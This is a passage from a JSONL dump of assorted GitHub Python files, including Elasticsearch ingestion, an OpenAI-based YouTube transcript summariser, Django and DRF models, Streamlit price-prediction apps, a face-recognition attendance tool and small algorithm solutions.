i in range(0, len_data, batch_size):\n success, failed = bulk(es, data[i : i + batch_size])\n\n if failed:\n print(f\"Error al indexar {failed} documentos.\")\n else:\n print(f\"Se indexaron los documentos correctamente.\")\n\n ingestion_bulk(\"well_geology\")\n\n end_time = time.time()\n all_time = end_time - start_time\n\n print(f\"Tiempo de procesamiento: {float(all_time) / 60} minutos.\")\n","repo_name":"CristianERP/elastic","sub_path":"well_geology_parallel.py","file_name":"well_geology_parallel.py","file_ext":"py","file_size_in_byte":3122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"1620154821","text":"import openai\nimport pandas as pd\nfrom pytube import YouTube\nfrom transformers import T5Tokenizer\nfrom transformers import T5Tokenizer, T5ForConditionalGeneration\nfrom transformers import GPT2TokenizerFast\nfrom transformers import pipeline\nimport textwrap\nfrom concurrent.futures import ThreadPoolExecutor\nimport logging\nimport warnings\nimport yt_dlp\nimport os\n# Supress warnings\nlogging.basicConfig(level=logging.CRITICAL)\nwarnings.filterwarnings(\"ignore\")\n\n# OpenAI API key\nopenai.api_key = \"Your OpenAI API Key\"\n\ndef get_transcript(youtubelink):\n video_url = youtubelink\n\n # Create a yt-dlp instance\n ydl_opts = {\n 'format': 'bestaudio/best',\n 'extractaudio': True,\n 'audioformat': 'mp3',\n 'outtmpl': 'audio_file.mp3',\n 'noplaylist': True,\n }\n with yt_dlp.YoutubeDL(ydl_opts) as ydl:\n # Extract video information\n video_info = ydl.extract_info(video_url, download=False)\n # Download the audio\n ydl.download([video_url])\n\n audio_file = \"audio_file.mp3\"\n\n \n\n with open(audio_file, \"rb\") as audio:\n transcript = openai.Audio.translate(\"whisper-1\", audio)\n\n thetext = transcript['text']\n\n with open(\"full_transcript.txt\", \"w\") as file:\n file.write(thetext)\n\n # Remove the audio file after processing\n os.remove(audio_file)\n\n return thetext\n\n\n\ndef count_tokens(input_data, max_tokens=20000, input_type='text'):\n tokenizer = GPT2TokenizerFast.from_pretrained(\"gpt2\")\n \n if input_type == 'text':\n tokens = tokenizer.tokenize(input_data)\n elif input_type == 'tokens':\n tokens = input_data\n else:\n raise ValueError(\"Invalid input_type. Must be 'text' or 'tokens'\")\n\n # Print the number of tokens\n token_count = len(tokens)\n return token_count\n\n\n\ndef truncate_text_by_tokens(text, max_tokens=3000):\n tokenizer = GPT2TokenizerFast.from_pretrained(\"gpt2\")\n \n # Tokenize the input text\n tokens = tokenizer.tokenize(text)\n\n # Truncate tokens to final_max_tokens\n truncated_tokens = tokens[:max_tokens]\n\n trunc_token_len = count_tokens(truncated_tokens, input_type='tokens')\n\n print(\"Truncated Summary Token Length:\"+ str(trunc_token_len))\n\n # Convert the truncated tokens back to text\n truncated_text = tokenizer.convert_tokens_to_string(truncated_tokens)\n\n return truncated_text\n\n\n\ndef summarize_chunk(classifier, chunk):\n summary = classifier(chunk)\n return summary[0][\"summary_text\"]\n\n\n\ndef summarize_text(text, model_name=\"t5-small\", max_workers=8):\n classifier = pipeline(\"summarization\", model=model_name)\n summarized_text = \"\"\n\n # Split the input text into smaller chunks\n chunks = textwrap.wrap(text, width=500, break_long_words=False)\n\n # Parallelize the summarization of the chunks\n with ThreadPoolExecutor(max_workers=max_workers) as executor:\n summaries = executor.map(lambda chunk: summarize_chunk(classifier, chunk), chunks)\n summarized_text = \" \".join(summaries)\n text_len_in_tokens = count_tokens(text)\n print(\"Tokens in full transcript\" + str(text_len_in_tokens))\n summary_token_len = count_tokens(summarized_text)\n print(\"Summary Token Length:\"+ str(summary_token_len))\n\n if summary_token_len > 2500:\n summarized_text = truncate_text_by_tokens(summarized_text, max_tokens=2500)\n\n else:\n summarized_text = summarized_text\n\n\n with open(\"transcript_summary.txt\", \"w\") as file:\n file.write(summarized_text)\n\n\n print(\"summarized by t5\")\n return summarized_text.strip()\n\n\n\ndef gpt_summarize_transcript(transcript_text,token_len):\n # Check the 
length of the transcript\n \n # Generate the summary using the OpenAI ChatCompletion API\n response = openai.ChatCompletion.create(\n model=\"gpt-3.5-turbo\",\n messages=[\n {\"role\": \"system\", \"content\": \"You are an expert at summarizing long documents into concise and comprehensive summaries. Your summaries often capture the essence of the original text.\"},\n {\"role\": \"user\", \"content\": \"I have a long transcript that I would like you to summarize for me. Please think carefully and do the best job you possibly can.\"},\n {\"role\": \"system\", \"content\": \"Absolutely, I will provide a concise and comprehensive summary of the transcript.\"},\n {\"role\": \"user\", \"content\": \"Excellent, here is the transcript: \" + transcript_text}\n ],\n max_tokens=3800 - token_len,\n n=1,\n stop=None,\n temperature=0.5,\n )\n\n # Extract the generated summary from the response\n summary = response['choices'][0]['message']['content']\n print(\"summarized by GPT3\")\n\n with open(\"transcript_summary.txt\", \"w\") as file:\n file.write(summary)\n\n\n # Return the summary\n return summary.strip()\n \n\n\ndef generate_tweet_thread(transcript_text):\n # Generate the tweets using the OpenAI ChatCompletion API\n response = openai.ChatCompletion.create(\n model=\"gpt-3.5-turbo\",\n messages=[\n {\"role\": \"system\", \"content\": \"You are an expert at writing tweet threads that are incredibly interesting and potentially newsworthy. You are known to go viral.\"},\n {\"role\": \"user\", \"content\": \"I have text that I would like you to use as the basis for coming up with multiple tweets for a long-form twitter thread. Please think step by step and do the best job you possibly can. Each tweet should be on a new line\"},\n {\"role\": \"system\", \"content\": \"Absolutely, I will provide a list of tweets on new lines for easy parsing. This tweet thread should be written to go viral. I will make sure each tweet is less than 250 characters.\"},\n {\"role\": \"user\", \"content\": \"Excellent, here is the transcript: \" + transcript_text},\n {\"role\": \"system\", \"content\": \"My list will be formatted as: Tweet 1 \\n\\n Tweet 2 \\n\\n Tweet 3 \\n\\n etc.\"}\n\n ],\n max_tokens=900,\n n=1,\n stop=None,\n temperature=0.5,\n )\n\n # Extract the generated tweets from the response\n tweets = response['choices'][0]['message']['content']\n print(tweets)\n\n # Split the tweets into separate parts\n tweets = tweets.split(\"\\n\\n\")\n print(tweets)\n\n # Create a dataframe from the tweets\n df = pd.DataFrame({\"tweet\": tweets})\n df.to_csv('Tweet_Thread.csv')\n\n # Return the tweets as a list\n return tweets\n\n\n\ndef generate_long_form_article(transcript_text,token_len):\n # Generate the article outline using the OpenAI ChatCompletion API\n response = openai.ChatCompletion.create(\n model=\"gpt-3.5-turbo\",\n messages=[\n {\"role\": \"system\", \"content\": \"You are an expert at writing long-form article outlines that are informative, engaging, and well-researched. Your articles often go viral and are widely shared.\"},\n {\"role\": \"user\", \"content\": \"I have some text that I would like you to use as the basis for a long-form article outline. Please think carefully and do the best job you can to come up with an outline for the article.\"},\n {\"role\": \"system\", \"content\": \"Absolutely, I will provide a comprehensive and well-structured outline for the article based on the content. 
I will provide the result numbered with roman numerals \"},\n {\"role\": \"user\", \"content\": \"Excellent, here is the transcript: \" + transcript_text},\n {\"role\": \"system\", \"content\": \"Here are the sections without any start text, numbered by roman numerals\"}\n\n ],\n max_tokens=3700 - token_len,\n n=1,\n stop=None,\n temperature=0.5,\n )\n\n # Extract the article outline from the response\n outline = response['choices'][0]['message']['content']\n outline_token_count = count_tokens(outline)\n sections = outline.strip().split(\"\\n\\n\")\n parsed_data = []\n for section in sections:\n lines = section.strip().split(\"\\n\")\n section_title = lines[0].strip()\n section_items = [item.strip() for item in lines[1:]]\n parsed_data.append([section_title, section_items])\n \n with open(\"article_outline.txt\", \"w\") as file:\n file.write(str(parsed_data))\n\n\n\n generated_sections = []\n # Loop through each section in the outline\n for section in parsed_data:\n # Generate the section using the OpenAI ChatCompletion API\n response = openai.ChatCompletion.create(\n model=\"gpt-3.5-turbo\",\n messages=[\n {\"role\": \"system\", \"content\": \"You are an expert at writing long-form articles that are informative, engaging, and well-researched. Your articles often go viral and are widely shared. You will be given an article outline for context, and instructions on which section of the outline to complete.\"},\n {\"role\": \"user\", \"content\": \"I have a section of an article that I would like you to write for me. Please think carefully and do the best job you can to come up with a well-written and comprehensive section. Please also take into consideration the article's outline so that you can write without overlapping pevious points and build on each section.\"},\n {\"role\": \"system\", \"content\": \"Absolutely, I will provide a comprehensive and well-written section based taking into consideration the outline. 
I will provide only the section text without any additional text\"},\n {\"role\": \"user\", \"content\": \"Excellent, here is the outline to use to understand your goal better: \" + outline + \" and the section to write: \" + str(section)}\n ],\n max_tokens=3700-outline_token_count,\n n=1,\n stop=None,\n temperature=0.2,\n )\n\n # Extract the generated section from the response\n generated_section = response['choices'][0]['message']['content']\n\n\n # Add the generated section to the list of generated sections\n generated_sections.append(generated_section)\n\n # Combine the generated sections into a finished article\n article = \"\\n\\n\".join(generated_sections)\n\n # Save the article to a text file\n with open(\"long_form_article.txt\", \"w\") as file:\n file.write(article)\n\n # Return the article\n return article\n\n\n\n# Get the transcript from the video\ntranscription = get_transcript(\"Your Youtube Video URL\")\n\n# Get the token length of the transcript\ntoken_count = count_tokens(transcription)\nprint(token_count)\n\n\n\n# Summarize with either GPT3 or T5 depending on length of transcript:\nif token_count > 3000:\n summarized_text = summarize_text(transcription)\n new_token_count = count_tokens(summarized_text)\nelse:\n summarized_text = gpt_summarize_transcript(transcription,token_count)\n new_token_count = count_tokens(summarized_text) \n\n\n\n# Generate the tweet thread using the summary\ntweets = generate_tweet_thread(summarized_text)\n\n\n\n# Generate the long-form article using the summary\narticle = generate_long_form_article(summarized_text,new_token_count)\n\n\n\n\n","repo_name":"Phishman81/audio-transcript","sub_path":"backup.py","file_name":"backup.py","file_ext":"py","file_size_in_byte":10979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"41219809003","text":"from django.db import models\nfrom Users.models import Users\nclass Shopcart(models.Model):\n id = models.AutoField(primary_key=True)\n #购买商品\n goods = models.CharField(max_length=20)\n #购买数量\n count = models.IntegerField()\n #添加时间\n add_time = models.TimeField()\n #小记金额\n subtotal = models.IntegerField()\n #所属用户\n users = models.ForeignKey(Users)\n\n\n# Create your models here.\n","repo_name":"wzk1997/commerce","sub_path":"shopcart/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"3052913378","text":"import streamlit as st\nimport pandas as pd\nimport streamlit.components.v1 as components\nimport time\nimport numpy as np\nimport pickle\nimport json\nfrom sklearn.ensemble import RandomForestRegressor\nimport altair as alt\n\nwith open('locations.json','r') as f:\n location = json.load(f)\n\n\n\nwith open('mysore_home_prices_model.pickle', 'rb') as f:\n model = pickle.load(f)\n\nwith open(\"columns.json\", \"r\") as f:\n data_columns = json.load(f)['data_columns']\n \n\ndef predict_price(location,ppsqft,area,beds): \n loc_index = data_columns.index(location)\n beds_index = data_columns.index(beds)\n \n x = np.zeros(len(data_columns))\n #x[0] = beds\n x[0] = area\n x[1] = ppsqft\n \n if loc_index >= 0:\n x[loc_index] = 1\n if beds_index >= 0:\n x[beds_index] = 1\n\n return model.predict([x])[0]\n\n@st.cache\ndef load_data():\n data = pd.read_csv('combined_cleaned.csv')\n return data\n\ndata_load_state = st.text('Loading data...')\ndata = load_data()\ndata_load_state.text(\"\")\nlocation_list = list(location.keys())\nlocation_list.append('None')\n\n\n## Sidebar code\ncities_filter = st.sidebar.multiselect('Select 2 more locaitons for price comparision', location_list)\nif cities_filter:\n loc_select = st.sidebar.selectbox(\"Select the location\",location_list,index=location_list.index(cities_filter[0]))\nelse:\n loc_select = st.sidebar.selectbox(\"Select the location\",location_list,index=location_list.index('None'))\nbeds_select = st.sidebar.slider('Number of Beds', 1,8) \n\n\n# main page code\nst.markdown(\"\"\"
House Price Prediction - Mysore
\"\"\",unsafe_allow_html=True)\n\n\nif loc_select != 'None':\n predicted_price = round(predict_price(loc_select,location[loc_select],(500*beds_select)+500,beds_select),2)\n if predicted_price >= 100:\n st.markdown(f\"\"\" Approximate price of house in `{loc_select}` with `{beds_select}` beds is \"\"\",unsafe_allow_html=True)\n st.markdown(f\"\"\"
₹{round(predicted_price/100,2)} Crores
\"\"\",unsafe_allow_html=True)\n else:\n st.markdown(f\"\"\" Approximate price of house in `{loc_select}` with `{beds_select}` beds is \"\"\",unsafe_allow_html=True)\n st.markdown(f\"\"\"
Predict the price of a laptop that would suit your needs the best.
\", unsafe_allow_html=True)\r\n\r\n st.write(\"A random forest is a machine learning technique that's used to solve regression and classification problems.\")\r\n st.write(\"Random Forest Regression is a supervised learning algorithm that uses ensemble learning method for regression. Ensemble learning method is a technique that combines predictions from multiple machine learning algorithms to make a more accurate prediction than a single model.\")\r\n st.write(\"Random Forest Regression model is powerful and accurate. It usually performs great on many problems, including features with non-linear relationships. Disadvantages, however, include the following: there is no interpretability, overfitting may easily occur, we must choose the number of trees to include in the model.\")\r\n\r\n st.markdown(\"\"\"---\"\"\")\r\n\r\n import requests\r\n from streamlit_lottie import st_lottie\r\n \r\n def load_lottieurl(url):\r\n r = requests.get(url)\r\n if r.status_code != 200:\r\n return None\r\n return r.json()\r\n \r\n lottie_coding = load_lottieurl(\"https://assets7.lottiefiles.com/packages/lf20_ba013t74.json\")\r\n\r\n st_lottie(lottie_coding, height=200, key=\"coding\")\r\n\r\n st.markdown(\"\"\"---\"\"\")\r\n\r\n st.subheader(\"More info:\")\r\n st.write(\"To see other author’s projects: https://jaroslavkotrba.com\")\r\n # ---- HIDE STREAMLIT STYLE ----\r\n hide_st_style = \"\"\"\r\n \r\n \"\"\"\r\n st.markdown(hide_st_style, unsafe_allow_html=True)\r\n\r\n elif choice == \"About\":\r\n # Title\r\n st.markdown(\"
Laptop Price About
\", unsafe_allow_html=True)\r\n st.write(\"
Predict the price of a laptop that would suit your needs the best.
'\n Email.send_email(html)\n print(html)\n with open (\"G:/8.python/pytest_testApi/report/report.html\", \"w\") as f:\n f.write(html)\n else:\n print(\"本次测试,所有用例全部通过\")\n #send_email(\"本次测试,所有用例全部通过\")\n\n#\n#\nif __name__ == '__main__':\n #pytest.main(['--html=../report/report.html','test_cashierPay01.py'])\n # pytest.main([\"-s\", \"test_epspApi.py\", \"--pytest_report\", 'G:/8.python/pytest_testApi/report/report_' +datetime.datetime.today().strftime('%Y-%m-%d')+ '.html'])\n pytest.main([\"-s\", \"test_epspApi.py\", \"--pytest_report\", 'G:/8.python/pytest_testApi/report/report_' + time.strftime(\"%Y%m%d%H%M%S\",time.localtime(time.time())) + '.html'])\n\n","repo_name":"amnpt/EpspTest","sub_path":"testCase/test_epspApi.py","file_name":"test_epspApi.py","file_ext":"py","file_size_in_byte":12129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"32387678104","text":"import subprocess\nimport sys\n\ndef get_platform():\n platforms = {\n 'linux1' : 'Linux',\n 'linux2' : 'Linux',\n 'darwin' : 'OS X',\n 'win32' : 'Windows'\n }\n \n if sys.platform not in platforms:\n return sys.platform\n \n return platforms[sys.platform]\n\n \ndef checkKey(d, k):\n if k in d:\n return True\n else:\n return False\n\ndef run(command:str):\n data = subprocess.run(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)\n # print(data.args)\n # print(data.returncode)\n \n if data.returncode == 0:\n # print(data.stdout.decode())\n return {\"status\": True, \"result\" : data.stdout.decode()}\n else:\n # print(data.stderr.decode())\n return {\"status\": False, \"result\" : data.stderr.decode()}\n\n return data\n","repo_name":"HenriqueLuizz/inspetor-lestrade","sub_path":"src/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"39159521772","text":"from src.core.model import *\nfrom src.core.barcode import *\nfrom src.core.date import *\nfrom src.core.webscraping import *\nfrom database.tables import *\nfrom database.database import Database\n\ndef sub_menu_options():\n print('1. Capturar fotos de estudiante')\n print('2. Actualizar sistema')\n print('3. Regresar')\n return int(input('Seleccionar opción: '))\n\ndef sub_menu():\n while True:\n opt = sub_menu_options()\n\n if opt == 1:\n print('Por favor, muestre el cósigo de barras del carnet...')\n barcode_detector = BarcodeDetector()\n barcode_detector.detect_barcodes()\n student_id = barcode_detector.get_id()\n db = Database()\n\n if db.student_exists(student_id):\n print('Este proceso es solo para nuevos estudiantes...')\n else:\n web_scraper = WebScraper(student_id)\n web_scraper.initialize_driver()\n student = web_scraper.scrape_student_data()\n\n db.insert_student(student)\n web_scraper.close_driver()\n print(student.name, ' agregado a la base de datos!')\n\n print('Para tomar fotos de tu rostro, por favor mire la cámara...')\n capture_frame = CaptureFrame(student_id)\n capture_frame.capture_faces()\n capture_frame.release_resources()\n print('Capturas de imágenes guardadas!')\n\n elif opt == 2:\n face_trainer = FaceRecognitionTrainer()\n face_trainer.train_model()\n\n elif opt == 3:\n print('Regresando...')\n break\n\n else:\n print('Esta opción no existe, inténtalo de nuevo.')\n\ndef menu_options():\n print('::::::: checkID :::::::')\n print('1. Comenzar')\n print('2. Opciones de administrador')\n print('3. Crear base de datos')\n print('4. Salir')\n return int(input('Seleccione una opción: '))\n\ndef menu():\n while True:\n option = menu_options()\n if option == 1:\n\n barcode_detector = BarcodeDetector()\n barcode_detector.detect_barcodes()\n id = int(barcode_detector.get_id())\n db = Database()\n if db.student_exists(id):\n print('Código validado')\n face_recognition = FaceRecognition(id)\n face_recognition.load_model()\n face_recognition.recognize_faces()\n if face_recognition.validated:\n date = CurrentDate()\n registration = Registration(id, date.get_current_date(), date.get_current_time())\n db.insert_registration(registration)\n print('Acceso otorgado!')\n else:\n print('El rostro no coincide')\n else:\n print('No eres de esta universidad')\n\n elif option == 2:\n sub_menu()\n\n elif option == 3:\n db = Database()\n db.create_tables()\n student1 = Student(21200026, 'rodrigo davila vasquez', 'ingeniería de software')\n student2 = Student(21200195, 'Kevin tupac aguero', 'ingeniería de software')\n db.insert_student(student1)\n db.insert_student(student2)\n\n elif option == 4:\n print('Saliendo del sistema...')\n break\n\n else:\n print('Esta opción no existe, intténtalo de nuevo')\n\nif __name__ == '__main__':\n menu()\n","repo_name":"diegoam11/check-id","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"38825571812","text":"from __future__ import print_function\nimport pickle\nfrom game import Board, Game\nfrom mcts_pure import MCTSPlayer as MCTS_Pure\nfrom mcts_alphaZero import MCTSPlayer\nfrom police_value_net_numpy import PolicyValueNetNumpy\nfrom policy_value_net_pytorch import PolicyValueNet\n\nclass Human(object):\n def __init__(self):\n self.player = None\n\n def setPlayerInd(self, p):\n self.player = p\n\ndef run():\n n, width, height = 5, 8, 8\n model_file = 'best_policy_8_8_5.model'\n try:\n board = Board(width = width, height = height, n_in_row = n)\n game = Game(board)\n policy_param = pickle.load(open(model_file, 'rb'), encoding = 'bytes')\n bestPolicy = PolicyValueNetNumpy(width, height, policy_param)\n mctsPlayer = MCTSPlayer(bestPolicy.policyValueFn, cPuct = 5, nPlayout = 400)\n human = Human()\n game.startPlay(human, mctsPlayer, startPlayer = 1, isShown = 1)\n except KeyboardInterrupt:\n print('\\n\\rquit')\n\nif __name__ == '__main__':\n run()","repo_name":"Tokiwa-17/fiveInARow","sub_path":"human_play.py","file_name":"human_play.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"70061105927","text":"from collections import defaultdict\n\nfrom utils.exceptions import SolutionNotFoundError\n\n\ndef get_digit_tuple(n: int) -> tuple[int, ...]:\n \"\"\"Get a 10-tuple of the digits of n.\"\"\"\n y = n\n dlist = [0] * 10\n while y != 0:\n d = y % 10\n dlist[d] += 1\n y //= 10\n return tuple(dlist)\n\n\ndef get_smallest_cube_with_five_perms() -> int:\n \"\"\"Get the smallest cube with 5 permutations that are also cube.\"\"\"\n tuples = defaultdict(set)\n max_n = 10000\n for n in range(max_n):\n cube = n**3\n tup = get_digit_tuple(cube)\n tuples[tup].add(cube)\n if len(tuples[tup]) == 5:\n return min(tuples[tup])\n raise SolutionNotFoundError(f\"No solution for n<{max_n}.\")\n","repo_name":"JohN100x1/Project-Euler","sub_path":"src/solutions/p062.py","file_name":"p062.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"7292729889","text":"from rest_framework import serializers\n\nfrom .models import Product\n\nclass ProductSerializer(serializers.HyperlinkedModelSerializer):\n image = serializers.ImageField(\n max_length = None, allow_empty_file = False, allow_null = True, required = False) #requirements\n class Meta:\n model = Product\n fields = ('id', 'name', 'activity', 'country','mountains','description', 'price', 'image', 'price_table', 'category','description_long', 'product_url', 'location', 'slopes_easy', 'slopes_medium', 'slopes_hard', 'slopes_total', 'snow_mountain','snow_valley', 'rating_resort', 'rating_family' ,'rating_scenery', 'resort_map', 'peak_altitude')\n\n","repo_name":"rhribar/airjoy.io","sub_path":"api/product/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"26149793970","text":"class Solution:\n def smallestBeautifulString(self, s: str, k: int) -> str:\n n = len(s)\n arr = [ord(ch) for ch in s]\n\n # since s has already been beautiful\n # for i position, we only need to check i-1 and i-2 position\n # i-1: AA palindrome\n # i-2: AXA palindrome\n def checkBautiful(arr, i):\n if i-1 >= 0 and arr[i-1] == arr[i]: # check AA palindrome\n return False\n if i-2 >= 0 and arr[i-2] == arr[i]: # check AXA palindrome\n return False\n return True\n \n for i in range(n-1, -1, -1):\n for ch in range(arr[i]+1, ord(\"a\")+k):\n arr[i] = ch\n if checkBautiful(arr, i):\n k = i+1\n \n while k < n:\n mod = 0\n arr[k] = ord(\"a\")+mod\n while not checkBautiful(arr, k):\n mod = (mod+1)%3\n arr[k] = ord(\"a\")+mod\n\n k += 1\n\n return \"\".join(chr(rune) for rune in arr)\n return \"\"\n","repo_name":"Vergil0327/leetcode-history","sub_path":"String/2663. Lexicographically Smallest Beautiful String/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"9259114506","text":"from auditlog.models import AuditlogHistoryField\nfrom auditlog.registry import auditlog\nfrom django.db import models\nfrom django.db.models.signals import pre_save, post_save\nfrom django.dispatch import receiver\n\nfrom sme_ptrf_apps.core.models_abstracts import ModeloBase\nfrom .fornecedor import Fornecedor\nfrom .validators import cpf_cnpj_validation\nfrom ..status_cadastro_completo import STATUS_CHOICES, STATUS_COMPLETO, STATUS_INCOMPLETO\nfrom ...core.models import Associacao\n\n\nclass Despesa(ModeloBase):\n history = AuditlogHistoryField()\n\n associacao = models.ForeignKey(Associacao, on_delete=models.PROTECT, related_name='despesas', blank=True,\n null=True)\n\n numero_documento = models.CharField('Nº do documento', max_length=100, default='', blank=True)\n\n tipo_documento = models.ForeignKey('TipoDocumento', on_delete=models.PROTECT, blank=True, null=True)\n\n data_documento = models.DateField('Data do documento', blank=True, null=True)\n\n cpf_cnpj_fornecedor = models.CharField(\n \"CPF / CNPJ\", max_length=20, validators=[cpf_cnpj_validation]\n , blank=True, null=True, default=\"\"\n )\n\n nome_fornecedor = models.CharField(\"Nome do fornecedor\", max_length=100, default='', blank=True)\n\n tipo_transacao = models.ForeignKey('TipoTransacao', on_delete=models.PROTECT, blank=True, null=True)\n\n documento_transacao = models.CharField('Nº doc transação', max_length=100, default='', blank=True)\n\n data_transacao = models.DateField('Data da transacao', blank=True, null=True)\n\n valor_total = models.DecimalField('Valor Total', max_digits=8, decimal_places=2, default=0)\n\n valor_recursos_proprios = models.DecimalField('Valor pago com recursos próprios', max_digits=8, decimal_places=2,\n default=0)\n\n valor_original = models.DecimalField('Valor original', max_digits=8, decimal_places=2, default=0)\n\n status = models.CharField(\n 'status',\n max_length=15,\n choices=STATUS_CHOICES,\n default=STATUS_INCOMPLETO\n )\n\n @property\n def valor_ptrf(self):\n return self.valor_total - self.valor_recursos_proprios\n\n valor_ptrf.fget.short_description = 'Valor coberto pelo PTRF'\n\n def __str__(self):\n return f\"{self.numero_documento} - {self.data_documento} - {self.valor_total:.2f}\"\n\n def cadastro_completo(self):\n completo = self.tipo_documento and \\\n self.data_documento and \\\n self.cpf_cnpj_fornecedor and \\\n self.nome_fornecedor and \\\n self.tipo_transacao and \\\n self.data_transacao and \\\n self.valor_total > 0\n\n if completo and self.tipo_transacao.tem_documento:\n completo = completo and self.documento_transacao\n\n if completo and self.tipo_documento.numero_documento_digitado:\n completo = completo and self.numero_documento\n\n if completo:\n for rateio in self.rateios.all():\n completo = completo and rateio.status == STATUS_COMPLETO\n\n return completo\n\n def atualiza_status(self):\n cadastro_completo = self.cadastro_completo()\n status_completo = self.status == STATUS_COMPLETO\n if cadastro_completo != status_completo:\n self.save() # Força um rec'alculo do status.\n\n @classmethod\n def by_documento(cls, tipo_documento, numero_documento, cpf_cnpj_fornecedor, associacao__uuid):\n return cls.objects.filter(associacao__uuid=associacao__uuid).filter(\n cpf_cnpj_fornecedor=cpf_cnpj_fornecedor).filter(tipo_documento=tipo_documento).filter(\n numero_documento=numero_documento).first()\n class Meta:\n verbose_name = \"Despesa\"\n verbose_name_plural = \"Despesas\"\n\n\n@receiver(pre_save, sender=Despesa)\ndef 
proponente_pre_save(instance, **kwargs):\n instance.status = STATUS_COMPLETO if instance.cadastro_completo() else STATUS_INCOMPLETO\n\n\n@receiver(post_save, sender=Despesa)\ndef rateio_post_save(instance, created, **kwargs):\n # Existe um motivo para o fornecedor não ser uma FK nesse modelo e ele ser atualizado indiretamente\n # A existência da tabela de fornecedores é apenas para facilitar o preenchimento da despesa pelas associações\n # Alterações feitas por uma associação no nome de um fornecedor não deve alterar diretamente as despesas de outras\n if instance and instance.cpf_cnpj_fornecedor and instance.nome_fornecedor:\n Fornecedor.atualiza_ou_cria(cpf_cnpj=instance.cpf_cnpj_fornecedor, nome=instance.nome_fornecedor)\n\n\nauditlog.register(Despesa)\n","repo_name":"ollyvergithub/SME-PTRF-BackEnd","sub_path":"sme_ptrf_apps/despesas/models/despesa.py","file_name":"despesa.py","file_ext":"py","file_size_in_byte":4649,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"286272498","text":"\"\"\"\n see on psana\n /cds/sw/ds/ana/conda1/manage/bin/psconda.sh # lcls1\n /cds/sw/ds/ana/conda2/manage/bin/psconda.sh # lcls2\n see on s3df\n /sdf/group/lcls/ds/ana/sw/conda1/manage/bin/psconda.sh # lcls1\n /sdf/group/lcls/ds/ana/sw/conda2/manage/bin/psconda.sh # lcls2\n\n DIR_ROOT for repositories and logfiles through the environment variable:\n /reg/g/psdm # lcls\n /cds/group/psdm # lcls2\n /sdf/group/psdm # s3df ???\n\n DIR_PSDM\n /cds/group/psdm # on psana lcls2\n /cds/group/psdm # on sdflogin lcls2\n\n SIT_PSDM_DATA\n /sdf/data/lcls/ds/\n\n ffb data\n /sdf/data/lcls/drpsrcf/ffb/\n\nfrom psana.detector.dir_root import DIR_ROOT, DIR_REPO\n\"\"\"\nimport os\n\nHOSTNAME = os.getenv('HOSTNAME', None) # ex: pslogin02\nif HOSTNAME is None:\n import socket\n HOSTNAME = socket.gethostname()\n#print('TEST dir_root.HOSTNAME %s' % HOSTNAME)\n\nDIR_ROOT = os.getenv('DIR_PSDM') # /cds/group/psdm\nDIR_LOG_AT_START = os.path.join(DIR_ROOT, 'detector/logs/atstart/') # /cds/group/psdm/detector/logs/atstart\nDIR_REPO = os.path.join(DIR_ROOT, 'detector/calib2/constants') # common repository\nDIR_REPO_EPIX10KA = DIR_REPO\n#DIR_REPO_EPIX10KA = os.path.join(DIR_ROOT, 'detector/gains2/epix10ka/panels') # /cds/group/psdm/detector/gains2/epix10ka/panels\n#DIR_REPO_DARK_PROC = DIR_REPO\n#DIR_REPO_DARK_PROC = os.path.join(DIR_ROOT, 'detector/calib2') # /cds/group/psdm/detector/calib2\nDIR_DATA_TEST = os.path.join(DIR_ROOT, 'detector/data2_test') # /cds/group/psdm/detector/data2_test/\nDIR_REPO_CALIBMAN = DIR_REPO # prev: /cds/group/psdm/detector/calib2/constants/logs\n#DIR_LOG_CALIBMAN = os.path.join(DIR_ROOT, 'detector/logs/calibman/lcls2') # /cds/group/psdm/detector/logs/calibman/lcls2\n\n# for s3df\nDIR_DATA = os.getenv('SIT_PSDM_DATA', '/sdf/data/lcls/ds') # /sdf/data/lcls/ds/\nDIR_FFB = os.path.join(DIR_DATA, '../drpsrcf/ffb').replace('/ds/../','/') # '/sdf/data/lcls/drpsrcf/ffb'\n# EOF\n","repo_name":"slac-lcls/lcls2","sub_path":"psana/psana/detector/dir_root.py","file_name":"dir_root.py","file_ext":"py","file_size_in_byte":2031,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"16"}
